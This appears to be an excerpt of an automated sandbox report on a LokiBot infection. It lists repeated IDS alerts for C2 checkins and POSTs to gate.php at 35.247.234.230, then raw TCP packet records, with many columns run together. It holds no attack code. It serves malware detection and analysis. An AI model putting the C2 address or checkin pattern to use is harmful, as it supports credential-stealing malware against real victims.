                                            04/29/21-09:19:15.458383 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49754 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:15.458383 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49754 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:15.458383 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49754 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:15.458383 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49754 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:15.458383 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49754 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:17.051023 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49755 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:17.051023 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49755 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:17.051023 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49755 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:17.051023 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49755 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:17.051023 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49755 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:18.349585 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49756 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:18.349585 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49756 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:18.349585 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49756 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:18.349585TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.335.247.234.230
                                            04/29/21-09:19:18.349585TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975680192.168.2.335.247.234.230
                                            04/29/21-09:19:19.940011TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.335.247.234.230
                                            04/29/21-09:19:19.940011TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.335.247.234.230
                                            04/29/21-09:19:19.940011TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.335.247.234.230
                                            04/29/21-09:19:19.940011TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.335.247.234.230
                                            04/29/21-09:19:19.940011TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975780192.168.2.335.247.234.230
                                            04/29/21-09:19:22.226751TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.335.247.234.230
                                            04/29/21-09:19:22.226751TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.335.247.234.230
                                            04/29/21-09:19:22.226751TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.335.247.234.230
                                            04/29/21-09:19:22.226751TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.335.247.234.230
                                            04/29/21-09:19:22.226751TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975880192.168.2.335.247.234.230
                                            04/29/21-09:19:23.478948TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.335.247.234.230
                                            04/29/21-09:19:23.478948TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.335.247.234.230
                                            04/29/21-09:19:23.478948TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.335.247.234.230
                                            04/29/21-09:19:23.478948TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.335.247.234.230
                                            04/29/21-09:19:23.478948TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975980192.168.2.335.247.234.230
                                            04/29/21-09:19:24.710111TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.335.247.234.230
                                            04/29/21-09:19:24.710111TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.335.247.234.230
                                            04/29/21-09:19:24.710111TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.335.247.234.230
                                            04/29/21-09:19:24.710111TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976080192.168.2.335.247.234.230
                                            04/29/21-09:19:24.710111TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976080192.168.2.335.247.234.230
                                            04/29/21-09:19:25.936890TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.335.247.234.230
                                            04/29/21-09:19:25.936890TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.335.247.234.230
                                            04/29/21-09:19:25.936890TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.335.247.234.230
                                            04/29/21-09:19:25.936890TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.335.247.234.230
                                            04/29/21-09:19:25.936890TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976180192.168.2.335.247.234.230
                                            04/29/21-09:19:27.173146TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.335.247.234.230
                                            04/29/21-09:19:27.173146TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.335.247.234.230
                                            04/29/21-09:19:27.173146TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.335.247.234.230
                                            04/29/21-09:19:27.173146TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.335.247.234.230
                                            04/29/21-09:19:27.173146TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976280192.168.2.335.247.234.230
                                            04/29/21-09:19:28.395926TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.335.247.234.230
                                            04/29/21-09:19:28.395926TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.335.247.234.230
                                            04/29/21-09:19:28.395926TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.335.247.234.230
                                            04/29/21-09:19:28.395926TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.335.247.234.230
                                            04/29/21-09:19:28.395926TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976380192.168.2.335.247.234.230
                                            04/29/21-09:19:29.651953TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.335.247.234.230
                                            04/29/21-09:19:29.651953TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.335.247.234.230
                                            04/29/21-09:19:29.651953TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.335.247.234.230
                                            04/29/21-09:19:29.651953TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976480192.168.2.335.247.234.230
                                            04/29/21-09:19:29.651953TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976480192.168.2.335.247.234.230
                                            04/29/21-09:19:30.895103TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.335.247.234.230
                                            04/29/21-09:19:30.895103TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.335.247.234.230
                                            04/29/21-09:19:30.895103TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.335.247.234.230
                                            04/29/21-09:19:30.895103TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.335.247.234.230
                                            04/29/21-09:19:30.895103TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976580192.168.2.335.247.234.230
                                            04/29/21-09:19:32.208436TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.335.247.234.230
                                            04/29/21-09:19:32.208436TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.335.247.234.230
                                            04/29/21-09:19:32.208436TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.335.247.234.230
                                            04/29/21-09:19:32.208436TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.335.247.234.230
                                            04/29/21-09:19:32.208436TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976680192.168.2.335.247.234.230
                                            04/29/21-09:19:33.595262TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.335.247.234.230
                                            04/29/21-09:19:33.595262TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.335.247.234.230
                                            04/29/21-09:19:33.595262TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.335.247.234.230
                                            04/29/21-09:19:33.595262TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.335.247.234.230
                                            04/29/21-09:19:33.595262TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976780192.168.2.335.247.234.230
                                            04/29/21-09:19:35.143655TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.335.247.234.230
                                            04/29/21-09:19:35.143655TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.335.247.234.230
                                            04/29/21-09:19:35.143655TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.335.247.234.230
                                            04/29/21-09:19:35.143655TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.335.247.234.230
                                            04/29/21-09:19:35.143655TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976980192.168.2.335.247.234.230
                                            04/29/21-09:19:36.416202TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.335.247.234.230
                                            04/29/21-09:19:36.416202TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.335.247.234.230
                                            04/29/21-09:19:36.416202TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.335.247.234.230
                                            04/29/21-09:19:36.416202TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.335.247.234.230
                                            04/29/21-09:19:36.416202TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977480192.168.2.335.247.234.230
                                            04/29/21-09:19:37.810118TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.335.247.234.230
                                            04/29/21-09:19:37.810118TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.335.247.234.230
                                            04/29/21-09:19:37.810118TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.335.247.234.230
                                            04/29/21-09:19:37.810118TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.335.247.234.230
                                            04/29/21-09:19:37.810118TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977580192.168.2.335.247.234.230
                                            04/29/21-09:19:39.063488TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.335.247.234.230
                                            04/29/21-09:19:39.063488TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.335.247.234.230
                                            04/29/21-09:19:39.063488TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.335.247.234.230
                                            04/29/21-09:19:39.063488TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.335.247.234.230
                                            04/29/21-09:19:39.063488TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977680192.168.2.335.247.234.230
                                            04/29/21-09:19:40.333359TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.335.247.234.230
                                            04/29/21-09:19:40.333359TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.335.247.234.230
                                            04/29/21-09:19:40.333359TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.335.247.234.230
                                            04/29/21-09:19:40.333359TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.335.247.234.230
                                            04/29/21-09:19:40.333359TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977780192.168.2.335.247.234.230
                                            04/29/21-09:19:41.793613TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.335.247.234.230
                                            04/29/21-09:19:41.793613TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.335.247.234.230
                                            04/29/21-09:19:41.793613TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.335.247.234.230
                                            04/29/21-09:19:41.793613TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.335.247.234.230
                                            04/29/21-09:19:41.793613TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977880192.168.2.335.247.234.230
                                            04/29/21-09:19:43.006592TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.335.247.234.230
                                            04/29/21-09:19:43.006592TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.335.247.234.230
                                            04/29/21-09:19:43.006592TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.335.247.234.230
                                            04/29/21-09:19:43.006592TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977980192.168.2.335.247.234.230
                                            04/29/21-09:19:43.006592TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977980192.168.2.335.247.234.230
                                            04/29/21-09:19:44.271005TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.335.247.234.230
                                            04/29/21-09:19:44.271005TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.335.247.234.230
                                            04/29/21-09:19:44.271005TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.335.247.234.230
                                            04/29/21-09:19:44.271005TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.335.247.234.230
                                            04/29/21-09:19:44.271005TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978080192.168.2.335.247.234.230
                                            04/29/21-09:19:45.490786TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.335.247.234.230
                                            04/29/21-09:19:45.490786TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.335.247.234.230
                                            04/29/21-09:19:45.490786TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.335.247.234.230
                                            04/29/21-09:19:45.490786TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.335.247.234.230
                                            04/29/21-09:19:45.490786TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978180192.168.2.335.247.234.230
                                            04/29/21-09:19:46.703122TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.335.247.234.230
                                            04/29/21-09:19:46.703122TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.335.247.234.230
                                            04/29/21-09:19:46.703122TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.335.247.234.230
                                            04/29/21-09:19:46.703122TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.335.247.234.230
                                            04/29/21-09:19:46.703122TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978280192.168.2.335.247.234.230
                                            04/29/21-09:19:47.909072TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.335.247.234.230
                                            04/29/21-09:19:47.909072TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.335.247.234.230
                                            04/29/21-09:19:47.909072TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.335.247.234.230
                                            04/29/21-09:19:47.909072TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.335.247.234.230
                                            04/29/21-09:19:47.909072TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978380192.168.2.335.247.234.230
                                            04/29/21-09:19:49.118558TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.335.247.234.230
                                            04/29/21-09:19:49.118558TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.335.247.234.230
                                            04/29/21-09:19:49.118558TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.335.247.234.230
                                            04/29/21-09:19:49.118558TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978480192.168.2.335.247.234.230
                                            04/29/21-09:19:49.118558TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978480192.168.2.335.247.234.230
                                            04/29/21-09:19:50.337780TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.335.247.234.230
                                            04/29/21-09:19:50.337780TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.335.247.234.230
                                            04/29/21-09:19:50.337780TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.335.247.234.230
                                            04/29/21-09:19:50.337780TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.335.247.234.230
                                            04/29/21-09:19:50.337780TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978580192.168.2.335.247.234.230
                                            04/29/21-09:19:51.565549TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.335.247.234.230
                                            04/29/21-09:19:51.565549TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.335.247.234.230
                                            04/29/21-09:19:51.565549TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.335.247.234.230
                                            04/29/21-09:19:51.565549TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978680192.168.2.335.247.234.230
                                            04/29/21-09:19:51.565549TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978680192.168.2.335.247.234.230
                                            04/29/21-09:19:52.973609TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.335.247.234.230
                                            04/29/21-09:19:52.973609TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.335.247.234.230
                                            04/29/21-09:19:52.973609TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.335.247.234.230
                                            04/29/21-09:19:52.973609TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.335.247.234.230
                                            04/29/21-09:19:52.973609TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978780192.168.2.335.247.234.230
                                            04/29/21-09:19:54.367482TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.335.247.234.230
                                            04/29/21-09:19:54.367482TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.335.247.234.230
                                            04/29/21-09:19:54.367482TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.335.247.234.230
                                            04/29/21-09:19:54.367482TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.335.247.234.230
                                            04/29/21-09:19:54.367482TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978880192.168.2.335.247.234.230
                                            04/29/21-09:19:56.496992TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.335.247.234.230
                                            04/29/21-09:19:56.496992TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.335.247.234.230
                                            04/29/21-09:19:56.496992TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.335.247.234.230
                                            04/29/21-09:19:56.496992TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.335.247.234.230
                                            04/29/21-09:19:56.496992TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978980192.168.2.335.247.234.230
                                            04/29/21-09:19:57.722593TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.335.247.234.230
                                            04/29/21-09:19:57.722593TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.335.247.234.230
                                            04/29/21-09:19:57.722593TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.335.247.234.230
                                            04/29/21-09:19:57.722593TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.2.335.247.234.230
                                            04/29/21-09:19:57.722593TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979080192.168.2.335.247.234.230
                                            04/29/21-09:19:58.937625TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.335.247.234.230
                                            04/29/21-09:19:58.937625TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.335.247.234.230
                                            04/29/21-09:19:58.937625TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.335.247.234.230
                                            04/29/21-09:19:58.937625TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.335.247.234.230
                                            04/29/21-09:19:58.937625TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979180192.168.2.335.247.234.230
                                            04/29/21-09:20:00.214625TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.335.247.234.230
                                            04/29/21-09:20:00.214625TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.335.247.234.230
                                            04/29/21-09:20:00.214625TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.335.247.234.230
                                            04/29/21-09:20:00.214625TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.2.335.247.234.230
                                            04/29/21-09:20:00.214625TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979280192.168.2.335.247.234.230
                                            04/29/21-09:20:01.445743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.335.247.234.230
                                            04/29/21-09:20:01.445743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.335.247.234.230
                                            04/29/21-09:20:01.445743TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.335.247.234.230
                                            04/29/21-09:20:01.445743TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.335.247.234.230
                                            04/29/21-09:20:01.445743TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979380192.168.2.335.247.234.230
                                            04/29/21-09:20:02.645327TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.335.247.234.230
                                            04/29/21-09:20:02.645327TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.335.247.234.230
                                            04/29/21-09:20:02.645327TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.335.247.234.230
                                            04/29/21-09:20:02.645327TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.2.335.247.234.230
                                            04/29/21-09:20:02.645327TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979480192.168.2.335.247.234.230
                                            04/29/21-09:20:03.844490TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.335.247.234.230
                                            04/29/21-09:20:03.844490TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.335.247.234.230
                                            04/29/21-09:20:03.844490TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.335.247.234.230
                                            04/29/21-09:20:03.844490TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.335.247.234.230
                                            04/29/21-09:20:03.844490TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979580192.168.2.335.247.234.230
                                            04/29/21-09:20:05.062420TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.2.335.247.234.230
                                            04/29/21-09:20:05.062420TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.2.335.247.234.230
                                            04/29/21-09:20:05.062420TCP2025381ET TROJAN LokiBot Checkin4979680192.168.2.335.247.234.230
                                            04/29/21-09:20:05.062420TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979680192.168.2.335.247.234.230
                                            04/29/21-09:20:05.062420TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4979680192.168.2.335.247.234.230

                                            Network Port Distribution

                                            TCP Packets

                                            Apr 29, 2021 09:19:05.411067009 CEST4974580192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:05.656377077 CEST804974535.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:05.656501055 CEST4974580192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:05.661257029 CEST4974580192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:05.906562090 CEST804974535.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:05.906627893 CEST4974580192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:06.152059078 CEST804974535.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:06.550230980 CEST804974535.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:06.550324917 CEST4974580192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:06.550400972 CEST4974580192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:06.798536062 CEST804974535.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:06.839443922 CEST4974680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:07.087621927 CEST804974635.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:07.088738918 CEST4974680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:07.091418028 CEST4974680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:07.339956999 CEST804974635.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:07.340069056 CEST4974680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:07.588301897 CEST804974635.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:07.810693979 CEST804974635.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:07.810914993 CEST4974680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:07.810940981 CEST4974680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:08.059703112 CEST804974635.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:08.381493092 CEST4974780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:08.627942085 CEST804974735.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:08.628037930 CEST4974780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:08.631181955 CEST4974780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:08.877726078 CEST804974735.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:08.877872944 CEST4974780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:09.124171972 CEST804974735.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:09.346967936 CEST804974735.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:09.347146988 CEST4974780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:09.347223043 CEST4974780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:09.595909119 CEST804974735.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:09.597233057 CEST4974880192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:09.843451977 CEST804974835.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:09.843579054 CEST4974880192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:09.846277952 CEST4974880192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:10.092509985 CEST804974835.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:10.096031904 CEST4974880192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:10.342083931 CEST804974835.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:10.716794014 CEST804974835.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:10.716928959 CEST4974880192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:10.717061043 CEST4974880192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:10.963257074 CEST804974835.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:11.015891075 CEST4974980192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:11.261850119 CEST804974935.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:11.262036085 CEST4974980192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:11.264755964 CEST4974980192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:11.510392904 CEST804974935.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:11.510535002 CEST4974980192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:11.756212950 CEST804974935.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:11.974939108 CEST804974935.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:11.975047112 CEST4974980192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:11.975126028 CEST4974980192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:12.220527887 CEST804974935.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:12.232404947 CEST4975080192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:12.478261948 CEST804975035.247.234.230192.168.2.3
                                            Apr 29, 2021 09:19:12.478396893 CEST4975080192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:12.481081963 CEST4975080192.168.2.335.247.234.230
                                            Apr 29, 2021 09:19:12.726418018 CEST804975035.247.234.230192.168.2.3
